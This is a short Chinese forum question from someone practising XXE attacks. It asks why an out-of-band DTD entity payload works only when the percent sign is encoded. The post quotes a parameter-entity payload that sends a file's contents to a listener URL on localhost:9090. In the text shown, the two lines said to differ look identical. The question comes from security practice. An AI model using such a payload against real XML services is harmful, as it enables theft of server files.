【发布时间】:2021-10-17 10:49:13
【问题描述】:
当我练习 XXE 时,我发现当我使用下面的 DTD ENTITY 发送我的请求时它可以工作。
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
但是当我发送这个时它不起作用。
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
它们的区别是“%”和“%”,我想知道为什么我这里直接使用“%”时不起作用。 谢谢。
【问题讨论】: